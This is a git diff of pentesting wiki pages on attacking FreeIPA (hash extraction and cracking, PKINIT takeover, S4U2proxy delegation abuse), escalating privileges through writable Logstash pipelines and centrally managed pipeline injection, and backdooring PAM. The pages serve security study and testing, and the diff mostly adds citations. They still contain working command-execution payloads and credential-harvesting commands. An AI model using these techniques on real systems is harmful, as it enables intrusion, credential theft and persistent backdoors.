-CCACHE files, stored typically in **`/tmp`** with **600** permissions, are binary formats for storing Kerberos credentials, important for authentication without a user's plaintext password due to their portability. Parsing a CCACHE ticket can be done using the `klist` command, and re-using a valid CCACHE Ticket involves exporting `KRB5CCNAME` to the ticket file's path.
+CCACHE files, stored typically in **`/tmp`** with **600** permissions, are binary formats for storing Kerberos credentials, important for authentication without a user's plaintext password due to their portability. Parsing a CCACHE ticket can be done using the `klist` command, and re-using a valid CCACHE Ticket involves exporting `KRB5CCNAME` to the ticket file's path.<sup>[[2]](#references)</sup>
 
 ### **Unix Keyring**
 
-Alternatively, CCACHE Tickets can be stored in the Linux keyring, offering more control over ticket management. The scope of ticket storage varies (`KEYRING:name`, `KEYRING:process:name`, `KEYRING:thread:name`, `KEYRING:session:name`, `KEYRING:persistent:uidnumber`), with `klist` capable of parsing this information for the user. However, re-using a CCACHE Ticket from the Unix keyring can pose challenges, with tools like **Tickey** available for extracting Kerberos tickets.
+Alternatively, CCACHE Tickets can be stored in the Linux keyring, offering more control over ticket management. The scope of ticket storage varies (`KEYRING:name`, `KEYRING:process:name`, `KEYRING:thread:name`, `KEYRING:session:name`, `KEYRING:persistent:uidnumber`), with `klist` capable of parsing this information for the user. However, re-using a CCACHE Ticket from the Unix keyring can pose challenges, with tools like **Tickey** available for extracting Kerberos tickets.<sup>[[2]](#references)</sup>
 
 ### Keytab
 
-Keytab files, containing Kerberos principals and encrypted keys, are critical for obtaining valid ticket granting tickets (TGT) without needing the principal's password. Parsing and re-using credentials from keytab files can be easily performed with utilities like `klist` and scripts such as **KeytabParser**.
+Keytab files, containing Kerberos principals and encrypted keys, are critical for obtaining valid ticket granting tickets (TGT) without needing the principal's password. Parsing and re-using credentials from keytab files can be easily performed with utilities like `klist` and scripts such as **KeytabParser**.<sup>[[2]](#references)</sup>
 
 ### Cheatsheet
 
@@ -51,19 +51,19 @@ You can find more information about how to use tickets in linux in the following
 ## Enumeration
 
 > [!WARNING]
-> You could perform the **enumeration** via **ldap** and other **binary** tools, or **connecting to the web page in the port 443 of the FreeIPA server**.
+> You can perform the **enumeration** via **LDAP** and the **`ipa`** CLI, or by connecting to the FreeIPA web interface.<sup>[[3]](#references)[[9]](#references)</sup>
 
 ### Hosts, Users, and Groups <a href="#id-4b3b" id="id-4b3b"></a>
 
-It's possible to create **hosts**, **users** and **groups**. Hosts and users are sorted into containers called “**Host Groups**” and “**User Groups**” respectively. These are similar to **Organizational Units** (OU).
+It's possible to create **hosts**, **users** and **groups**. Hosts and users are sorted into containers called “**Host Groups**” and “**User Groups**” respectively. These are similar to **Organizational Units** (OU).<sup>[[3]](#references)</sup>
 
-By default in FreeIPA, the LDAP server allows for **anonymous binds**, and a large swath of data is enumerable **unauthenticated**.<sup>[[3]](#references)</sup> This can enumerate all data available unauthenticated:
+By default in FreeIPA, the LDAP server allows for **anonymous binds**, and a large swath of data is enumerable **unauthenticated**; the following command requests the anonymously visible entries.<sup>[[3]](#references)</sup>
 
 ```
 ldapsearch -x
 ```
 
-To get **more information** you need to use an **authenticated** session (check the Authentication section to learn how to prepare an authenticated session).
+To get **more information** you need to use an **authenticated** session (check the Authentication section to learn how to prepare an authenticated session).<sup>[[3]](#references)</sup>
 
 ```bash
 # Get all users of domain
@@ -79,7 +79,7 @@ ldapsearch -Y gssapi -b "cn=computers,cn=accounts,dc=domain_name,dc=local"
 ldapsearch -Y gssapi -b "cn=hostgroups,cn=accounts,dc=domain_name,dc=local"
 ```
 
-From a domain joined machine you will be able to use **installed binaries** to enumerate the domain:<sup>[[3]](#references)</sup>
+From a domain joined machine you will be able to use **installed binaries** to enumerate the domain.<sup>[[3]](#references)</sup>
 
 ```bash
 ipa user-find
@@ -96,32 +96,32 @@ ipa hostgroup-show <host group> --all
 ```
 
 > [!TIP]
-> The **admin** user of **FreeIPA** is the equivalent to **domain admins** from **AD**.
+> The **admin** user of **FreeIPA** is the equivalent to **domain admins** from **AD**.<sup>[[8]](#references)</sup>
 
 ### Hashes <a href="#id-482b" id="id-482b"></a>
 
 The **root** user from the **IPA serve**r has access to the password **hashes**.<sup>[[7]](#references)</sup>
 
-- The password hash of a user is stored as **base64** in the “**userPassword**” **attribute**. This hash might be **SSHA512** (old versions of FreeIPA) or **PBKDF2_SHA256**.
-- The **Nthash** of the password store as **base64** in “**ipaNTHash**” if system has **integration** with **AD**.
+- User password hashes are stored in the LDAP `userPassword` attribute using a configured password-storage scheme; 389 Directory Server supports schemes including `SSHA512` and `PBKDF2_SHA256`.<sup>[[10]](#references)</sup>
+- In FreeIPA deployments integrated with AD, the NT hash may be exposed as base64 in the `ipaNTHash` attribute.<sup>[[7]](#references)[[11]](#references)</sup>
 
 To crack these hashes:
 
-• If freeIPA integrated with AD, **ipaNTHash** is easy to crack: You should **decode** **base64** -> re-encoded it as **ASCII** hex -> John The Ripper or **hashcat** can help you to crack it fast
+• If FreeIPA is integrated with AD, decode the base64 **`ipaNTHash`** value and re-encode it as ASCII hex before passing it to John the Ripper or **hashcat**.<sup>[[7]](#references)[[11]](#references)</sup>
 
-• If an old version of FreeIPA is used, so **SSHA512** is used: You should decode **base64** -> find SSHA512 **hash** -> John The Ripper or **hashcat** can help you to crack it
+• Older FreeIPA deployments may use **`SSHA512`**; decode the base64 value and pass the resulting format to John the Ripper or **hashcat**.<sup>[[7]](#references)[[10]](#references)</sup>
 
-• If new version of FreeIPA is used, so **PBKDF2_SHA256** is used: You should decode **base64** -> find PBKDF2_SHA256 -> it’s **length** is 256 byte. John can work with 256 bits (32 byte) -> SHA-265 used as the pseudo-random function, block size is 32 byte -> you can use only first 256 bit of our PBKDF2_SHA256 hash -> John The Ripper or hashcat can help you to crack it
+• When **`PBKDF2_SHA256`** is configured, the derived key is 256 bits (32 bytes); use John the Ripper or **hashcat** only when they support the exact stored format, and do not truncate the digest.<sup>[[10]](#references)[[13]](#references)</sup>
 
 <figure><img src="../images/image (655).png" alt=""><figcaption></figcaption></figure>
 
-To extract the hashes you need to be **root in the FreeIPA server**, there you can use the tool **`dbscan`** to extract them:
+To extract the hashes you need to be **root in the FreeIPA server**, where you can use the **`dbscan`** tool to dump Directory Server database contents.<sup>[[7]](#references)[[12]](#references)</sup>
 
 <figure><img src="../images/image (293).png" alt=""><figcaption></figcaption></figure>
 
 ### HBAC-Rules <a href="#id-482b" id="id-482b"></a>
 
-There are the rules that grant specific permissions to users or hosts over resources (hosts, services, service groups...)<sup>[[3]](#references)</sup>
+There are rules that grant specific permissions to users or hosts over resources (hosts, services, service groups...).<sup>[[3]](#references)</sup>
 
 ```bash
 # Enumerate using ldap
@@ -155,7 +155,7 @@ The role `User Administrator` has these privileges:
 - **Group Administrators**
 - **Stage User Administrators**
 
-With the following commands it's possibel to enumerate the roles, privileges and permissions:
+With the following commands it's possible to enumerate the roles, privileges and permissions.<sup>[[3]](#references)</sup>
 
 ```bash
 # Using ldap
@@ -175,19 +175,21 @@ In **FreeIPA**, a regular user usually **cannot read** the real **ACI / permissi
 
 #### Collector usage
 
+The current collector CLI is lowercase `ipahound`; the flags below are documented by the project.<sup>[[5]](#references)</sup>
+
 ```bash
 # Kerberos auth
-IPAHound -k -s dc1.domain.local -a freeipa_apoc.json
+ipahound -k -s dc1.domain.local -a freeipa_apoc.json
 
 # Username/password auth
-IPAHound -s dc1.domain.local -u 'uid=user,cn=users,cn=accounts,dc=domain,dc=local' -p 'Password123!' -a freeipa_apoc.json
+ipahound -s dc1.domain.local -u 'uid=user,cn=users,cn=accounts,dc=domain,dc=local' -p 'Password123!' -a freeipa_apoc.json
 
 # Save raw LDAP for offline re-processing
-IPAHound -k -s dc1.domain.local --output-raw raw.json
-IPAHound --input-raw raw.json -a freeipa_apoc.json
+ipahound -k -s dc1.domain.local --output-raw raw.json
+ipahound --input-raw raw.json -a freeipa_apoc.json
 ```
 
-For large datasets, importing the **APOC** JSON into **Neo4j** is much faster than GUI upload:<sup>[[6]](#references)</sup>
+For large datasets, importing the **APOC** JSON into **Neo4j** is much faster than GUI upload.<sup>[[4]](#references)[[5]](#references)[[6]](#references)</sup>
 
 ```cypher
 CREATE CONSTRAINT FOR (n:IPADomain) REQUIRE n.neo4jImportId IS UNIQUE;
@@ -200,6 +202,8 @@ CALL apoc.import.json("/path/to/freeipa_apoc.json");
 
 #### Useful FreeIPA inference points
 
+The collector maps these readable attributes to graph relationships and flags as follows.<sup>[[4]](#references)[[5]](#references)</sup>
+
 - **`memberOf`**: often the best low-privilege source to infer hidden **roles**, **privileges**, and **permissions**.
 - **`memberManager`**: indicates who can change group membership, which is an **`AddMember`** primitive.
 - **`managedBy`**: indicates ownership of a host/group, which becomes an **`Owns`** edge.
@@ -211,14 +215,14 @@ CALL apoc.import.json("/path/to/freeipa_apoc.json");
 
 #### Hunting sprayable users and lateral movement
 
-Use **`PasswordAuthAllow`** to build a focused spray list instead of spraying every principal:
+Use **`PasswordAuthAllow`** to build a focused spray list instead of spraying every principal.<sup>[[4]](#references)[[5]](#references)</sup>
 
 ```cypher
 MATCH (n:IPAUser) WHERE n.PasswordAuthAllow = True
 RETURN n.krbCanonicalName
 ```
 
-Then pivot with the FreeIPA-specific lateral movement edges:
+Then pivot with the FreeIPA-specific lateral movement edges.<sup>[[4]](#references)[[5]](#references)</sup>
 
 - **`CanSSH`**: an HBAC rule allows access to `sshd`.
 - **`CanSUDO`**: HBAC allows `sudo` **and** a matching sudo rule exists.
@@ -227,12 +231,12 @@ Then pivot with the FreeIPA-specific lateral movement edges:
 
 #### Service takeover, PKINIT, and delegation chaining
 
-If you control a **computer account**, remember that in FreeIPA it typically **owns its service principals**. That gives two main options:
+If you control a **computer account**, remember that in FreeIPA it typically **owns its service principals**. That gives two main options.<sup>[[4]](#references)</sup>
 
 - reset the service keys with **`ipa-getkeytab`**
 - avoid resetting the service password and instead abuse **PKINIT** by writing a certificate into the owned service LDAP object
 
-Minimal PKINIT takeover flow:
+Minimal PKINIT takeover flow:<sup>[[4]](#references)</sup>
 
 ```bash
 openssl req -new -newkey rsa:2048 -days 365 -nodes \
@@ -247,13 +251,13 @@ kinit -X X509_user_identity=FILE:srv.pem,private.key test/srv.domain.local@DOMAI
 ldapwhoami -H ldap://dc1.domain.local
 ```
 
-Notes:
+Notes:<sup>[[4]](#references)</sup>
 
 - The CSR **CN** needs to match the exact hostname.
 - Adding the cert with the **`ipa`** utility is not enough for this path; write **`userCertificate;binary`** via **LDAP**.
 - Verify the new identity with **`ldapwhoami`** before attempting delegation abuse.
 
-Once the service has an **`AllowedToDelegate`** path, use **S4U2proxy** to impersonate a privileged account to LDAP:
+Once the service has an **`AllowedToDelegate`** path, use **S4U2proxy** to impersonate a privileged account to LDAP.<sup>[[4]](#references)</sup>
 
 ```bash
 kvno -U admin -k service.keytab -P ldap/dc1.domain.local@DOMAIN.LOCAL \
@@ -261,7 +265,7 @@ kvno -U admin -k service.keytab -P ldap/dc1.domain.local@DOMAIN.LOCAL \
 KRB5CCNAME=ldap_admin.cache ldapwhoami -H ldap://dc1.domain.local
 ```
 
-If the graph instead shows **`AddMember`** followed by **`AddRBCD`**, add yourself to the delegated group first and then configure RBCD with `ipa service-add-delegation` before requesting the delegated LDAP ticket.
+If the graph instead shows **`AddMember`** followed by **`AddRBCD`**, add yourself to the delegated group first and then configure RBCD with `ipa service-add-delegation` before requesting the delegated LDAP ticket.<sup>[[4]](#references)</sup>
 
 ### Attack Scenario Example
 
@@ -281,7 +285,7 @@ In [https://posts.specterops.io/attacking-freeipa-part-iii-finding-a-path-677405
 >
 > **THIS HAS BEEN PATCHED.**
 
-You can check a detailed explaination in [https://posts.specterops.io/attacking-freeipa-part-iv-cve-2020-10747-7c373a1bf66b](https://posts.specterops.io/attacking-freeipa-part-iv-cve-2020-10747-7c373a1bf66b)<sup>[[1]](#references)</sup>
+You can check a detailed explaination in [https://posts.specterops.io/attacking-freeipa-part-iv-cve-2020-10747-7c373a1bf66b](https://posts.specterops.io/attacking-freeipa-part-iv-cve-2020-10747-7c373a1bf66b).<sup>[[1]](#references)</sup>
 
 ## References
 
@@ -293,5 +297,10 @@ You can check a detailed explaination in [https://posts.specterops.io/attacking-
 - [6] [IPAHound-GUI - GUI for the IPAHound collector](https://github.com/IPAHound/IPAHound-GUI)
 - [7] [Olga Karelova - Пентестим FreeIPA (Pentesting FreeIPA)](https://www.youtube.com/watch?v=9dOu-7BTwPQ)
 - [8] [Attacking FreeIPA — Part III: Finding A Path](https://posts.specterops.io/attacking-freeipa-part-iii-finding-a-path-677405b5b95e)
+- [9] [About FreeIPA](https://www.freeipa.org/page/About)
+- [10] [Password storage schemes in 389 Directory Server](https://github.com/389ds/389-ds-base/blob/main/src/lib389/doc/source/passwd.rst)
+- [11] [FreeIPA LDAP schema](https://github.com/freeipa/freeipa/blob/master/install/share/60basev3.ldif)
+- [12] [dbscan(1) manual page](https://github.com/389ds/389-ds-base/blob/main/man/man1/dbscan.1)
+- [13] [389 Directory Server PBKDF2 upgrade tests](https://github.com/389ds/389-ds-base/blob/main/dirsrvtests/tests/suites/password/pbkdf2_upgrade_plugin_test.py)
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/linux-hardening/software-information/logstash.md
+++ b/src/linux-hardening/software-information/logstash.md
@@ -1,14 +1,12 @@
 # Logstash Privilege Escalation
 
-{{#include ../../banners/hacktricks-training.md}}
-
 ## Logstash
 
-Logstash is used to **gather, transform, and dispatch logs** through a system known as **pipelines**. These pipelines are made up of **input**, **filter**, and **output** stages. An interesting aspect arises when Logstash operates on a compromised machine.
+Logstash is used to **gather, transform, and dispatch logs** through a system known as **pipelines**. These pipelines are made up of **input**, **filter**, and **output** stages.<sup>[[4]](#references)</sup> An interesting aspect arises when Logstash operates on a compromised machine.
 
 ### Pipeline Configuration
 
-Pipelines are configured in the file **/etc/logstash/pipelines.yml**, which lists the locations of the pipeline configurations:
+On Debian and RPM package installs, pipelines are configured via **/etc/logstash/pipelines.yml**, which lists the locations of the pipeline configurations; other distributions place `pipelines.yml` in the Logstash `path.settings` directory.<sup>[[5]](#references)[[6]](#references)</sup>
 
 ```yaml
 # Define your pipelines here. Multiple pipelines can be defined.
@@ -22,12 +20,12 @@ Pipelines are configured in the file **/etc/logstash/pipelines.yml**, which list
   pipeline.workers: 6
 ```
 
-This file reveals where the **.conf** files, containing pipeline configurations, are located. When employing an **Elasticsearch output module**, it's common for **pipelines** to include **Elasticsearch credentials**, which often possess extensive privileges due to Logstash's need to write data to Elasticsearch. Wildcards in configuration paths allow Logstash to execute all matching pipelines in the designated directory.
+This file reveals where the **.conf** files containing pipeline configurations are located. When using an **Elasticsearch output**, inspect its `user`/`password`, `cloud_auth`, or `api_key` settings; the account's effective privileges depend on Elasticsearch. A `path.config` glob loads every matching file for that pipeline.<sup>[[6]](#references)[[7]](#references)[[11]](#references)</sup>
 
-If Logstash is started with `-f <directory>` instead of `pipelines.yml`, **all files inside that directory are concatenated in lexicographical order and parsed as a single config**. This creates 2 offensive implications:
+If Logstash is started with `-f <directory>` instead of `pipelines.yml`, `-f` takes precedence and **all files inside that directory are concatenated in lexicographical order and parsed as a single config**.<sup>[[6]](#references)[[7]](#references)</sup> This creates 2 offensive implications:
 
 - A dropped file like `000-input.conf` or `zzz-output.conf` can change how the final pipeline is assembled
-- A malformed file can prevent the whole pipeline from loading, so validate payloads carefully before relying on auto-reload
+- A malformed file can make the combined config fail validation; during reload, Logstash retains the previous pipeline, so validate payloads before relying on auto-reload.<sup>[[1]](#references)</sup>
 
 ### Fast Enumeration on a Compromised Host
 
@@ -42,7 +40,7 @@ find /etc/logstash /usr/share/logstash -maxdepth 3 -type f \( -name '*.conf' -o 
 rg -n --hidden -S 'password|passwd|api[_-]?key|cloud_auth|ssl_keystore_password|truststore_password|user\s*=>|hosts\s*=>' /etc/logstash /usr/share/logstash 2>/dev/null
 ```
 
-Also check whether the local monitoring API is reachable. By default it binds on **127.0.0.1:9600**, which is usually enough after landing on the host:
+Also check whether the local monitoring API is reachable. By default it binds on **127.0.0.1:9600**, which is usually enough after landing on the host.<sup>[[8]](#references)</sup>
 
 ```bash
 curl -s http://127.0.0.1:9600/?pretty
@@ -50,23 +48,23 @@ curl -s http://127.0.0.1:9600/_node/pipelines?pretty
 curl -s http://127.0.0.1:9600/_node/stats/pipelines?pretty
 ```
 
-This usually gives you pipeline IDs, runtime details, and confirmation that your modified pipeline has been loaded.
+These endpoints expose pipeline IDs and settings, runtime metrics, and config-reload success/failure counters, helping confirm whether a change was accepted.<sup>[[8]](#references)[[17]](#references)[[18]](#references)</sup>
 
-Credentials recovered from Logstash commonly unlock **Elasticsearch**, so check [this other page about Elasticsearch](../../network-services-pentesting/9200-pentesting-elasticsearch.md).
+If a recovered credential targets **Elasticsearch**, check [this other page about Elasticsearch](../../network-services-pentesting/9200-pentesting-elasticsearch.md).
 
 ### Privilege Escalation via Writable Pipelines
 
-To attempt privilege escalation, first identify the user under which the Logstash service is running, typically the **logstash** user. Ensure you meet **one** of these criteria:
+To attempt privilege escalation, first identify the user under which the Logstash service is actually running; do not assume it is root or the **logstash** user. Ensure you meet **one** of these criteria:
 
 - Possess **write access** to a pipeline **.conf** file **or**
-- The **/etc/logstash/pipelines.yml** file uses a wildcard, and you can write to the target folder
+- The **/etc/logstash/pipelines.yml** file uses a wildcard, and you can write to the target folder.<sup>[[6]](#references)[[7]](#references)</sup>
 
 Additionally, **one** of these conditions must be fulfilled:
 
 - Capability to restart the Logstash service **or**
-- The **/etc/logstash/logstash.yml** file has **config.reload.automatic: true** set
+- The **/etc/logstash/logstash.yml** file has **config.reload.automatic: true** set.<sup>[[1]](#references)[[15]](#references)</sup>
 
-Given a wildcard in the configuration, creating a file that matches this wildcard allows for command execution. For instance:
+Given a wildcard in the configuration, creating a file that matches this wildcard allows for command execution.<sup>[[7]](#references)[[9]](#references)</sup> For instance:
 
 ```bash
 input {
@@ -84,15 +82,15 @@ output {
 }
 ```
 
-Here, **interval** determines the execution frequency in seconds. In the given example, the **whoami** command runs every 120 seconds, with its output directed to **/tmp/output.log**.
+Here, **interval** determines the execution frequency in seconds. In the given example, the **whoami** command runs every 120 seconds, with its output directed to **/tmp/output.log**.<sup>[[9]](#references)</sup>
 
-With **config.reload.automatic: true** in **/etc/logstash/logstash.yml**, Logstash will automatically detect and apply new or modified pipeline configurations without needing a restart.<sup>[[1]](#references)</sup> If there's no wildcard, modifications can still be made to existing configurations, but caution is advised to avoid disruptions.
+With **config.reload.automatic: true** in **/etc/logstash/logstash.yml**, Logstash will automatically detect and apply new or modified pipeline configurations without needing a restart.<sup>[[1]](#references)[[15]](#references)</sup> If there's no wildcard, modifications can still be made to existing configurations, but caution is advised to avoid disruptions.
 
 ### More Reliable Pipeline Payloads
 
-The `exec` input plugin still works in current releases and requires either an `interval` or a `schedule`. It executes by **forking** the Logstash JVM, so if memory is tight your payload may fail with `ENOMEM` instead of silently running.
+The `exec` input plugin still works in current releases and requires either an `interval` or a `schedule`. It executes by **forking** the Logstash JVM, so if memory is tight your payload may fail with `ENOMEM` instead of silently running.<sup>[[9]](#references)</sup>
 
-A more practical privilege-escalation payload is usually one that leaves a durable artifact:
+When the service has sufficient privileges to create a root-owned SUID file, a practical privilege-escalation payload is one that leaves a durable artifact:
 
 ```bash
 input {
@@ -118,10 +116,10 @@ Be aware that not every plugin is reload-friendly. For example, the **stdin** in
 
 Before focusing only on code execution, harvest the data Logstash already has access to:
 
-- Plaintext credentials are often hardcoded inside `elasticsearch {}` outputs, `http_poller`, JDBC inputs, or cloud-related settings
-- Secure settings may live in **`/etc/logstash/logstash.keystore`** or another `path.settings` directory
-- The keystore password is frequently supplied through **`LOGSTASH_KEYSTORE_PASS`**, and package-based installs commonly source it from **`/etc/sysconfig/logstash`**
-- Environment-variable expansion with `${VAR}` is resolved at Logstash startup, so the service environment is worth inspecting
+- Credentials may appear in `elasticsearch {}` outputs, `http_poller` URLs/settings, JDBC inputs, or cloud-related settings; these plugins expose credential fields worth searching for.<sup>[[11]](#references)[[12]](#references)[[13]](#references)</sup>
+- Secure settings may live in **`/etc/logstash/logstash.keystore`** or another `path.settings` directory.<sup>[[5]](#references)[[10]](#references)</sup>
+- The keystore password may be supplied through **`LOGSTASH_KEYSTORE_PASS`**, and RPM/DEB installs source service environment variables from **`/etc/sysconfig/logstash`**.<sup>[[10]](#references)</sup>
+- Environment-variable expansion with `${VAR}` is resolved at Logstash startup, so the service environment is worth inspecting.<sup>[[14]](#references)</sup>
 
 Useful checks:
 
@@ -134,7 +132,7 @@ journalctl -u logstash --no-pager 2>/dev/null | tail -n 200
 ls -lah /var/log/logstash 2>/dev/null
 ```
 
-This is also worth checking because **CVE-2023-46672** showed that Logstash could record sensitive information in logs under specific circumstances. On a post-exploitation host, old Logstash logs and `journald` entries may therefore disclose credentials even if the current config references the keystore instead of storing secrets inline.<sup>[[3]](#references)</sup>
+This is also worth checking because **CVE-2023-46672** showed that, under specific circumstances, Logstash recorded sensitive information in its logs, including secrets stored in its keystore and referenced from configuration; review old Logstash logs and `journald` entries if those circumstances may apply.<sup>[[3]](#references)</sup>
 
 ### Centralized Pipeline Management Abuse
 
@@ -142,11 +140,11 @@ In some environments, the host does **not** rely on local `.conf` files at all. 
 
 That means a different attack path:
 
-1. Recover Elastic credentials from local Logstash settings, the keystore, or logs
-2. Verify whether the account has the **`manage_logstash_pipelines`** cluster privilege
-3. Create or replace a centrally managed pipeline so the Logstash host executes your payload on its next poll interval
+1. Recover Elastic credentials from local Logstash settings, the keystore, or logs.<sup>[[3]](#references)[[10]](#references)</sup>
+2. Verify whether the account has the **`manage_logstash_pipelines`** cluster privilege.<sup>[[16]](#references)</sup>
+3. Create or replace a centrally managed pipeline so the Logstash host executes your payload on its next poll interval.<sup>[[2]](#references)[[16]](#references)</sup>
 
-The Elasticsearch API used for this feature is:<sup>[[2]](#references)</sup>
+The Elasticsearch API used for this feature is:<sup>[[16]](#references)</sup>
 
 ```bash
 curl -X PUT http://ELASTIC:9200/_logstash/pipeline/pwned \
@@ -154,18 +152,42 @@ curl -X PUT http://ELASTIC:9200/_logstash/pipeline/pwned \
   -u user:password \
   -d '{
     "description": "malicious pipeline",
+    "last_modified": "2026-01-02T02:50:51.250Z",
+    "username": "user",
     "pipeline": "input { exec { command => \"id > /tmp/.ls-rce\" interval => 120 } } output { null {} }",
     "pipeline_metadata": {"type": "logstash_pipeline", "version": "1"},
-    "pipeline_settings": {"pipeline.workers": 1, "pipeline.batch.size": 1}
+    "pipeline_settings": {
+      "pipeline.workers": 1,
+      "pipeline.batch.size": 1,
+      "pipeline.batch.delay": 50,
+      "queue.type": "memory",
+      "queue.max_bytes": "1gb",
+      "queue.checkpoint.writes": 1024
+    }
   }'
 ```
 
-This is especially useful when local files are read-only but Logstash is already registered to fetch pipelines remotely.
+This is especially useful when local files are read-only but Logstash is already registered to fetch pipelines remotely.<sup>[[2]](#references)[[16]](#references)</sup>
 
 ## References
 
 - [1] [Elastic Docs: Reloading the Config File](https://www.elastic.co/guide/en/logstash/8.19/reloading-config.html)
 - [2] [Elastic Docs: Configure Centralized Pipeline Management](https://www.elastic.co/guide/en/logstash/8.19/configuring-centralized-pipelines.html)
 - [3] [Logstash 8.11.1 Security Update (ESA-2023-26) - CVE-2023-46672](https://discuss.elastic.co/t/logstash-8-11-1-security-update-esa-2023-26/347191)
+- [4] [Elastic Docs: Creating a Logstash Pipeline](https://www.elastic.co/docs/reference/logstash/creating-logstash-pipeline)
+- [5] [Elastic Docs: Logstash Directory Layout](https://www.elastic.co/docs/reference/logstash/dir-layout)
+- [6] [Elastic Docs: Multiple Pipelines](https://www.elastic.co/docs/reference/logstash/multiple-pipelines)
+- [7] [Elastic Docs: Running Logstash from the Command Line](https://www.elastic.co/docs/reference/logstash/running-logstash-command-line)
+- [8] [Elastic Docs: Monitoring Logstash with APIs](https://www.elastic.co/docs/reference/logstash/monitoring-logstash)
+- [9] [Elastic Docs: Exec input plugin](https://www.elastic.co/docs/reference/logstash/plugins/plugins-inputs-exec)
+- [10] [Elastic Docs: Secrets keystore for secure settings](https://www.elastic.co/docs/reference/logstash/keystore)
+- [11] [Elastic Docs: Elasticsearch output plugin](https://www.elastic.co/docs/reference/logstash/plugins/plugins-outputs-elasticsearch)
+- [12] [Elastic Docs: Http_poller input plugin](https://www.elastic.co/docs/reference/logstash/plugins/plugins-inputs-http_poller)
+- [13] [Elastic Docs: Jdbc input plugin](https://www.elastic.co/docs/reference/logstash/plugins/plugins-inputs-jdbc)
+- [14] [Elastic Docs: Using environment variables](https://www.elastic.co/docs/reference/logstash/environment-variables)
+- [15] [Elastic Docs: logstash.yml](https://www.elastic.co/docs/reference/logstash/logstash-settings-file)
+- [16] [Elasticsearch API: Create or update a Logstash pipeline](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-logstash-put-pipeline)
+- [17] [Logstash API: Get settings for pipelines](https://www.elastic.co/docs/api/doc/logstash/operation/operation-nodeinfopipelines)
+- [18] [Logstash API: Get statistics for pipelines](https://www.elastic.co/docs/api/doc/logstash/operation/operation-nodestatspipelines)
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/linux-hardening/software-information/pam-pluggable-authentication-modules.md
+++ b/src/linux-hardening/software-information/pam-pluggable-authentication-modules.md
@@ -1,14 +1,12 @@
 # PAM - Pluggable Authentication Modules
 
-{{#include ../../banners/hacktricks-training.md}}
-
 ### Basic Information
 
 **PAM (Pluggable Authentication Modules)** acts as a security mechanism that **verifies the identity of users attempting to access computer services**, controlling their access based on various criteria. It's akin to a digital gatekeeper, ensuring that only authorized users can engage with specific services while potentially limiting their usage to prevent system overloads.
 
 #### Configuration Files
 
-- **Solaris and UNIX-based systems** typically utilize a central configuration file located at `/etc/pam.conf`.
+- **Solaris** supports the legacy central file `/etc/pam.conf`, but current guidance prefers service files under `/etc/pam.d`.<sup>[[10]](#references)</sup>
 - **Linux systems** prefer a directory approach, storing service-specific configurations within `/etc/pam.d`. For instance, the configuration file for the login service is found at `/etc/pam.d/login`.<sup>[[1]](#references)</sup>
 
 An example of a PAM configuration for the login service might look like this:
@@ -41,45 +39,59 @@ Controls dictate the module's response to success or failure, influencing the ov
 
 - **Required**: Failure of a required module results in eventual failure, but only after all subsequent modules are checked.
 - **Requisite**: Immediate termination of the process upon failure.
-- **Sufficient**: Success bypasses the rest of the same realm's checks unless a subsequent module fails.
+- **Sufficient**: If no earlier `required` module failed, success returns immediately and skips the remaining modules in the same management group.
 - **Optional**: Only causes failure if it's the sole module in the stack.
 
 #### Offensive Semantics That Matter
 
-When backdooring PAM, the **location of the inserted rule** is often more important than the payload itself:
+When analyzing or modifying PAM, the **location of an inserted rule** determines which stack sees it:<sup>[[1]](#references)[[13]](#references)</sup>
 
-- `include` and `substack` pull rules from other files, so editing `sshd` might only affect SSH while editing `system-auth`, `common-auth`, or another shared stack affects several services at once.
-- PAM also supports bracketed controls such as `[success=1 default=ignore]`. These can be abused to **skip one or more modules** after a successful custom check instead of visibly replacing `pam_unix.so`.
-- The `module-path` can be **absolute** (`/usr/lib/security/pam_custom.so`) or **relative** to the default PAM module directory. On modern Linux systems the real directories are often `/lib/security`, `/lib64/security`, `/usr/lib/security`, or multiarch paths like `/usr/lib/x86_64-linux-gnu/security`.
+- `include` and `substack` pull rules from other files, so editing `sshd` might only affect SSH while editing `system-auth`, `common-auth`, or another shared stack affects several services at once.<sup>[[1]](#references)[[13]](#references)</sup>
+- PAM also supports bracketed controls such as `[success=1 default=ignore]`. These can be abused to **skip one or more modules** after a successful custom check instead of visibly replacing `pam_unix.so`.<sup>[[1]](#references)</sup>
+- The `module-path` can be **absolute** (`/usr/lib/security/pam_custom.so`) or **relative** to the default PAM module directory. On modern Linux systems the real directories are often `/lib/security`, `/lib64/security`, `/usr/lib/security`, or multiarch paths like `/usr/lib/x86_64-linux-gnu/security`.<sup>[[1]](#references)[[14]](#references)</sup>
 
-Quick operator takeaway: always map the **full service graph** before patching. For example, `sshd -> password-auth -> system-auth` on some distros or `sshd -> system-remote-login -> system-login -> system-auth` on others means the same one-line implant may fan out much wider than intended.
+Quick operator takeaway: always map the **full service graph** before patching. For example, `sshd -> password-auth -> system-auth` on some distros or `sshd -> system-remote-login -> system-login -> system-auth` on others means the same one-line implant may fan out much wider than intended.<sup>[[1]](#references)[[13]](#references)</sup>
 
 #### Example Scenario
 
-In a setup with multiple auth modules, the process follows a strict order. If the `pam_securetty` module finds the login terminal unauthorized, root logins are blocked, yet all modules are still processed due to its "required" status. The `pam_env` sets environment variables, potentially aiding in user experience. The `pam_ldap` and `pam_unix` modules work together to authenticate the user, with `pam_unix` attempting to use a previously supplied password, enhancing efficiency and flexibility in authentication methods.
+In a setup with multiple auth modules, the process follows a strict order. If the `pam_securetty` module finds the login terminal unauthorized, root logins are blocked, yet all modules are still processed due to its "required" status. The `pam_env` sets environment variables, potentially aiding in user experience. The `pam_ldap` and `pam_unix` modules work together to authenticate the user, with `pam_unix` attempting to use a previously supplied password, enhancing efficiency and flexibility in authentication methods.<sup>[[1]](#references)[[13]](#references)[[15]](#references)[[16]](#references)[[17]](#references)</sup>
 
 
 ## Backdooring PAM – Hooking `pam_unix.so`
 
-A classic persistence trick in high-value Linux environments is to **swap the legitimate PAM library with a trojanised drop-in**.  Because every SSH / console login ends up calling `pam_unix.so:pam_sm_authenticate()`, a few lines of C are enough to capture credentials or implement a *magic* password bypass.<sup>[[2]](#references)</sup>
+A classic persistence trick in high-value Linux environments is to **swap the legitimate PAM library with a trojanised drop-in**. On a host whose PAM stack loads `pam_unix.so`, SSH or console authentication can invoke its `pam_sm_authenticate()` entry point; a malicious replacement can capture credentials or implement a *magic* password bypass.<sup>[[2]](#references)[[11]](#references)</sup>
 
